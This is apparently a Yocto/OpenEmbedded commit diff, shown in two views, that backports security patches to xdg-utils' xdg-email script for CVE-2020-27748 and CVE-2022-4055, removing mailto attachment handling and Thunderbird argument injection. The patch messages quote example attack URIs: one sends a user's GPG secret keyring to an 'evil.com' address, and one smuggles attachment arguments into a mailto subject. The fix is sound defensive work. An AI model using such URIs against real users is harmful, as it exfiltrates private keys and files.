3 files changed, 206 insertions, 1 deletions
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+This allows attacker to extract secrets from users:
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
+++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+ 
+ run_thunderbird()
+ {
+-    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
+    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+     THUNDERBIRD="$1"
+     MAILTO=$(echo "$2" | sed 's/^mailto://')
+     echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+     BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+     SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+     BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-    ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+ 
+     if [ -z "$TO" ] ; then
+         NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+         NEWMAILTO="${NEWMAILTO},$BODY"
+     fi
+ 
+-    if [ -n "$ATTACH" ] ; then
+-        NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+-    fi
+-
+     NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+     DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+     "$THUNDERBIRD" -compose "$NEWMAILTO"
+-- 
+GitLab
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
new file mode 100644
index 0000000000..b236030108
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,145 @@
+xdg-email does not parse mailto uris properly for thunderbird
+When using thunderbird as mailto handler xdg-email translates mailto uris into an 'thunderbird -compose' argument. While to, cc and bcc values are properly enclosed in single quotes this is not the case for subject or body. This breaks functionality and allows to use all thunderbird -compose arguments within a mailto uri, e.g.
+xdg-email 'mailto:test@example.com?subject=Test,attachment=~/.thunderbird/profiles.ini,message=/home/test/test.txt'
+translates into
+thunderbird -compose to='test@example.com,',subject=Test,attachment=~/.thunderbird/profiles.ini,message=/home/test/test.txt
+with working attachment and message. (And, yes, ~ expands to the home directory.)
+Upstream-Status: Submitted [https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/205]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+CVE: CVE-2022-4055
+Index: xdg-utils-1.1.3/scripts/xdg-email.in
+===================================================================
+--- xdg-utils-1.1.3.orig/scripts/xdg-email.in
+++ xdg-utils-1.1.3/scripts/xdg-email.in
+@@ -30,53 +30,6 @@ _USAGE
+ 
+ #@xdg-utils-common@
+ 
+-run_thunderbird()
+-{
+-    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+-    THUNDERBIRD="$1"
+-    MAILTO=$(echo "$2" | sed 's/^mailto://')
+-    echo "$MAILTO" | grep -qs "^?"
+-    if [ "$?" = "0" ] ; then
+-        MAILTO=$(echo "$MAILTO" | sed 's/^?//')
+-    else
+-        MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
+-    fi
+-
+-    MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
+-    TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+-    CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+-    BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+-    SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+-    BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-
+-    if [ -z "$TO" ] ; then
+-        NEWMAILTO=
+-    else
+-        NEWMAILTO="to='$TO'"
+-    fi
+-    if [ -n "$CC" ] ; then
+-        NEWMAILTO="${NEWMAILTO},cc='$CC'"
+-    fi
+-    if [ -n "$BCC" ] ; then
+-        NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
+-    fi
+-    if [ -n "$SUBJECT" ] ; then
+-        NEWMAILTO="${NEWMAILTO},$SUBJECT"
+-    fi
+-    if [ -n "$BODY" ] ; then
+-        NEWMAILTO="${NEWMAILTO},$BODY"
+-    fi
+-
+-    NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+-    DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+-    "$THUNDERBIRD" -compose "$NEWMAILTO"
+-    if [ $? -eq 0 ]; then
+-        exit_success
+-    else
+-        exit_failure_operation_failed
+-    fi
+-}
+-
+ open_kde()
+ {
+     if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
+@@ -130,15 +83,6 @@ open_kde()
+ 
+ open_gnome3()
+ {
+-    local client
+-    local desktop
+-    desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+-    client=`desktop_file_to_binary "$desktop"`
+-    echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+-    if [ $? -eq 0 ] ; then
+-        run_thunderbird "$client" "$1"
+-    fi
+-
+     if gio help open 2>/dev/null 1>&2; then
+         DEBUG 1 "Running gio open \"$1\""
+         gio open "$1"
+@@ -159,13 +103,6 @@ open_gnome3()
+ 
+ open_gnome()
+ {
+-    local client
+-    client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
+-    echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+-    if [ $? -eq 0 ] ; then
+-        run_thunderbird "$client" "$1"
+-    fi
+-
+     if gio help open 2>/dev/null 1>&2; then
+         DEBUG 1 "Running gio open \"$1\""
+         gio open "$1"
+@@ -231,15 +168,6 @@ open_flatpak()
+ 
+ open_generic()
+ {
+-    local client
+-    local desktop
+-    desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+-    client=`desktop_file_to_binary "$desktop"`
+-    echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+-    if [ $? -eq 0 ] ; then
+-        run_thunderbird "$client" "$1"
+-    fi
+-
+     xdg-open "$1"
+     local ret=$?
+ 
+@@ -364,21 +292,6 @@ while [ $# -gt 0 ] ; do
+         shift
+         ;;
+ 
+-      --attach)
+-        if [ -z "$1" ] ; then
+-            exit_failure_syntax "file argument missing for --attach option"
+-        fi
+-        check_input_file "$1"
+-        file=`readlink -f "$1"` # Normalize path
+-        if [ -z "$file" ] || [ ! -f "$file" ] ; then
+-            exit_failure_file_missing "file '$1' does not exist"
+-        fi
+-
+-        url_encode "$file"
+-        options="${options}attach=${result}&"
+-        shift
+-        ;;
+-
+       -*)
+         exit_failure_syntax "unexpected option '$parm'"
+         ;;
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..4d93180535 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
 SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
           file://0001-Reinstate-xdg-terminal.patch \
           file://0001-Don-t-build-the-in-script-manual.patch \
+           file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
+           file://CVE-2022-4055.patch \
          "
 SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
@@ -34,4 +36,4 @@ inherit autotools-brokensep features_check
 REQUIRED_DISTRO_FEATURES = "x11"
 DEPENDS = "xmlto-native libxslt-native"
-RDEPENDS_${PN} += "xprop"
+RDEPENDS:${PN} += "xprop"

diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
		1	From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
		2	From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
		3	Date: Tue, 18 Aug 2020 16:52:24 +0100
		4	Subject: [PATCH] xdg-email: remove attachment handling from mailto
		5	MIME-Version: 1.0
		6	Content-Type: text/plain; charset=UTF-8
		7	Content-Transfer-Encoding: 8bit
		8
		9	This allows attacker to extract secrets from users:
		10
		11	mailto:sid@evil.com?attach=/.gnupg/secring.gpg
		12
		13	See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
		14	and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
		15
		16	Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
		17	---
		18	scripts/xdg-email.in \| 7 +------
		19	1 file changed, 1 insertion(+), 6 deletions(-)
		20
		21	Upstream-Status: Backport
		22	CVE: CVE-2020-27748
		23
		24	diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
		25	index 6db58ad..5d2f4f3 100644
		26	--- a/scripts/xdg-email.in
		27	+++ b/scripts/xdg-email.in
		28	@@ -32,7 +32,7 @@ _USAGE
		29
		30	run_thunderbird()
		31	{
		32	- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
		33	+ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
		34	THUNDERBIRD="$1"
		35	MAILTO=$(echo "$2" \| sed 's/^mailto://')
		36	echo "$MAILTO" \| grep -qs "^?"
		37	@@ -48,7 +48,6 @@ run_thunderbird()
		38	BCC=$(/bin/echo -e $(echo "$MAILTO" \| grep '^bcc=' \| sed 's/^bcc=//;s/%\(..\)/\\x\1/g' \| awk '{ printf "%s,",$0 }'))
		39	SUBJECT=$(echo "$MAILTO" \| grep '^subject=' \| tail -n 1)
		40	BODY=$(echo "$MAILTO" \| grep '^body=' \| tail -n 1)
		41	- ATTACH=$(/bin/echo -e $(echo "$MAILTO" \| grep '^attach=' \| sed 's/^attach=//;s/%\(..\)/\\x\1/g' \| awk '{ printf "%s,",$0 }' \| sed 's/,$//'))
		42
		43	if [ -z "$TO" ] ; then
		44	NEWMAILTO=
		45	@@ -68,10 +67,6 @@ run_thunderbird()
		46	NEWMAILTO="${NEWMAILTO},$BODY"
		47	fi
		48
		49	- if [ -n "$ATTACH" ] ; then
		50	- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
		51	- fi
		52	-
		53	NEWMAILTO=$(echo "$NEWMAILTO" \| sed 's/^,//')
		54	DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
		55	"$THUNDERBIRD" -compose "$NEWMAILTO"
		56	--
		57	GitLab
		58


diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch new file mode 100644 index 0000000000..b236030108 --- /dev/null +++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,145 @@
		1	xdg-email does not parse mailto uris properly for thunderbird
		2
		3	When using thunderbird as mailto handler xdg-email translates mailto uris into an 'thunderbird -compose' argument. While to, cc and bcc values are properly enclosed in single quotes this is not the case for subject or body. This breaks functionality and allows to use all thunderbird -compose arguments within a mailto uri, e.g.
		4
		5	xdg-email 'mailto:test@example.com?subject=Test,attachment=~/.thunderbird/profiles.ini,message=/home/test/test.txt'
		6
		7	translates into
		8
		9	thunderbird -compose to='test@example.com,',subject=Test,attachment=~/.thunderbird/profiles.ini,message=/home/test/test.txt
		10
		11	with working attachment and message. (And, yes, ~ expands to the home directory.)
		12
		13	Upstream-Status: Submitted [https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/205]
		14
		15	Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
		16
		17	CVE: CVE-2022-4055
		18
		19
		20	Index: xdg-utils-1.1.3/scripts/xdg-email.in
		21	===================================================================
		22	--- xdg-utils-1.1.3.orig/scripts/xdg-email.in
		23	+++ xdg-utils-1.1.3/scripts/xdg-email.in
		24	@@ -30,53 +30,6 @@ _USAGE
		25
		26	#@xdg-utils-common@
		27
		28	-run_thunderbird()
		29	-{
		30	- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
		31	- THUNDERBIRD="$1"
		32	- MAILTO=$(echo "$2" \| sed 's/^mailto://')
		33	- echo "$MAILTO" \| grep -qs "^?"
		34	- if [ "$?" = "0" ] ; then
		35	- MAILTO=$(echo "$MAILTO" \| sed 's/^?//')
		36	- else
		37	- MAILTO=$(echo "$MAILTO" \| sed 's/^/to=/' \| sed 's/?/\&/')
		38	- fi
		39	-
		40	- MAILTO=$(echo "$MAILTO" \| sed 's/&/\n/g')
		41	- TO=$(/bin/echo -e $(echo "$MAILTO" \| grep '^to=' \| sed 's/^to=//;s/%\(..\)/\\x\1/g' \| awk '{ printf "%s,",$0 }'))
		42	- CC=$(/bin/echo -e $(echo "$MAILTO" \| grep '^cc=' \| sed 's/^cc=//;s/%\(..\)/\\x\1/g' \| awk '{ printf "%s,",$0 }'))
		43	- BCC=$(/bin/echo -e $(echo "$MAILTO" \| grep '^bcc=' \| sed 's/^bcc=//;s/%\(..\)/\\x\1/g' \| awk '{ printf "%s,",$0 }'))
		44	- SUBJECT=$(echo "$MAILTO" \| grep '^subject=' \| tail -n 1)
		45	- BODY=$(echo "$MAILTO" \| grep '^body=' \| tail -n 1)
		46	-
		47	- if [ -z "$TO" ] ; then
		48	- NEWMAILTO=
		49	- else
		50	- NEWMAILTO="to='$TO'"
		51	- fi
		52	- if [ -n "$CC" ] ; then
		53	- NEWMAILTO="${NEWMAILTO},cc='$CC'"
		54	- fi
		55	- if [ -n "$BCC" ] ; then
		56	- NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
		57	- fi
		58	- if [ -n "$SUBJECT" ] ; then
		59	- NEWMAILTO="${NEWMAILTO},$SUBJECT"
		60	- fi
		61	- if [ -n "$BODY" ] ; then
		62	- NEWMAILTO="${NEWMAILTO},$BODY"
		63	- fi
		64	-
		65	- NEWMAILTO=$(echo "$NEWMAILTO" \| sed 's/^,//')
		66	- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
		67	- "$THUNDERBIRD" -compose "$NEWMAILTO"
		68	- if [ $? -eq 0 ]; then
		69	- exit_success
		70	- else
		71	- exit_failure_operation_failed
		72	- fi
		73	-}
		74	-
		75	open_kde()
		76	{
		77	if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
		78	@@ -130,15 +83,6 @@ open_kde()
		79
		80	open_gnome3()
		81	{
		82	- local client
		83	- local desktop
		84	- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
		85	- client=`desktop_file_to_binary "$desktop"`
		86	- echo $client \| grep -E 'thunderbird\|icedove' > /dev/null 2>&1
		87	- if [ $? -eq 0 ] ; then
		88	- run_thunderbird "$client" "$1"
		89	- fi
		90	-
		91	if gio help open 2>/dev/null 1>&2; then
		92	DEBUG 1 "Running gio open \"$1\""
		93	gio open "$1"
		94	@@ -159,13 +103,6 @@ open_gnome3()
		95
		96	open_gnome()
		97	{
		98	- local client
		99	- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command \| cut -d ' ' -f 1` \|\| ""
		100	- echo $client \| grep -E 'thunderbird\|icedove' > /dev/null 2>&1
		101	- if [ $? -eq 0 ] ; then
		102	- run_thunderbird "$client" "$1"
		103	- fi
		104	-
		105	if gio help open 2>/dev/null 1>&2; then
		106	DEBUG 1 "Running gio open \"$1\""
		107	gio open "$1"
		108	@@ -231,15 +168,6 @@ open_flatpak()
		109
		110	open_generic()
		111	{
		112	- local client
		113	- local desktop
		114	- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
		115	- client=`desktop_file_to_binary "$desktop"`
		116	- echo $client \| grep -E 'thunderbird\|icedove' > /dev/null 2>&1
		117	- if [ $? -eq 0 ] ; then
		118	- run_thunderbird "$client" "$1"
		119	- fi
		120	-
		121	xdg-open "$1"
		122	local ret=$?
		123
		124	@@ -364,21 +292,6 @@ while [ $# -gt 0 ] ; do
		125	shift
		126	;;
		127
		128	- --attach)
		129	- if [ -z "$1" ] ; then
		130	- exit_failure_syntax "file argument missing for --attach option"
		131	- fi
		132	- check_input_file "$1"
		133	- file=`readlink -f "$1"` # Normalize path
		134	- if [ -z "$file" ] \|\| [ ! -f "$file" ] ; then
		135	- exit_failure_file_missing "file '$1' does not exist"
		136	- fi
		137	-
		138	- url_encode "$file"
		139	- options="${options}attach=${result}&"
		140	- shift
		141	- ;;
		142	-
		143	-*)
		144	exit_failure_syntax "unexpected option '$parm'"
		145	;;


diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..4d93180535 100644 --- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
20	SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \	20	SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
21	file://0001-Reinstate-xdg-terminal.patch \	21	file://0001-Reinstate-xdg-terminal.patch \
22	file://0001-Don-t-build-the-in-script-manual.patch \	22	file://0001-Don-t-build-the-in-script-manual.patch \
		23	file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
		24	file://CVE-2022-4055.patch \
23	"	25	"
24		26
25	SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"	27	SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
@@ -34,4 +36,4 @@ inherit autotools-brokensep features_check
34	REQUIRED_DISTRO_FEATURES = "x11"	36	REQUIRED_DISTRO_FEATURES = "x11"
35		37
36	DEPENDS = "xmlto-native libxslt-native"	38	DEPENDS = "xmlto-native libxslt-native"
37	RDEPENDS_${PN} += "xprop"	39	RDEPENDS:${PN} += "xprop"